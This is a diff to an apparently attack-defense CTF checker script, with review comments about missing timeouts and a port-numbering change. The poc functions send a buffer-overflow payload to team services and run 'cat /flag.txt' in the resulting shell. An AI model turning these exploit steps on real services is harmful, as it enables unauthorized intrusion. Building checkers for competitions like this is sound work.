diff --git a/checker.py b/checker.py
index 25fe214..2ffd3f3 100644
--- a/checker.py
+++ b/checker.py
@@ -2,7 +2,7 @@ from pwn import process, remote
 HOST = "192.168.2.20"
-TOTAL_TEAMS = 10
+TOTAL_TEAMS = 1
 FORMAT = "SlashRootCTF"
@@ -15,7 +15,9 @@ def poc0(host, port):
 p = remote(host, port)
 p.recvuntil(">")
 p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01"))
- if "young" in p.recvuntil(">"):
+ msg = p.recvuntil(">")
+ # print(msg)
+ if "young" in msg:
 p.sendline("y")
 p.recvuntil(">")
 p.sendline("2")
@@ -27,7 +29,8 @@ def poc0(host, port):
 p.recvuntil(">")
 p.sendline("99")
 p.sendline("cat /flag.txt")
- flag = p.recv(46)
+ flag = p.recvuntil("}")
+ # print flag
 if FORMAT in flag:
 return True
 else:
@@ -60,7 +63,7 @@ def poc1(host, port):
 p.recvuntil(">")
 p.sendline("99")
 p.sendline("cat /flag.txt")
- flag = p.recv(46)
+ flag = p.recvuntil("}")
 if FORMAT in flag:
 return True
 else:
@@ -85,7 +88,7 @@ def poc2(host, port):
 p.recvuntil(">")
 p.sendline("99")
 p.sendline("cat /flag.txt")
- flag = p.recv(46)
+ flag = p.recvuntil("}")
 if FORMAT in flag:
 return True
 else:
@@ -95,7 +98,7 @@ def poc2(host, port):
 if __name__ == "__main__":
- for i in range(1):
+ for i in range(1, TOTAL_TEAMS+1):
 print poc0(HOST, (60004 + (i*100)))
 print poc1(HOST, (60004 + (i*100)))
 print poc2(HOST, (60004 + (i*100)))
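Review bot: The new `flag = p.recvuntil("}")` in poc0 has no timeout, so a service that never prints a closing brace (hung, or answering with an error instead of the flag) blocks the checker indefinitely. If the peer closes the connection, pwntools raises EOFError out of the function instead of letting it return False. The same line is added in the poc1 and poc2 hunks. Consider `flag = p.recvuntil("}", timeout=5)` and treating an empty result or EOFError as a failed check, since pwntools returns an empty string on timeout. All three function bodies extend outside the hunks, so an enclosing try/except or `p.close()` may already exist there.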
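Review bot: Starting the loop at 1 shifts every probed port by 100. The old `range(1)` checked 60004, while `range(1, TOTAL_TEAMS+1)` with `TOTAL_TEAMS = 1` checks only 60104, so the service on 60004 is no longer covered. If teams are numbered from 1 and 60104 really is the first team's port, say so with a comment such as `# team i listens on 60004 + i*100; teams are numbered from 1`. Otherwise `for i in range(TOTAL_TEAMS):` keeps the old base port. `TOTAL_TEAMS = 1` in the first hunk also looks like a local test value rather than the event's team count, which is worth confirming before merge, because one uncaught exception in any poc call would also end the loop for the remaining teams.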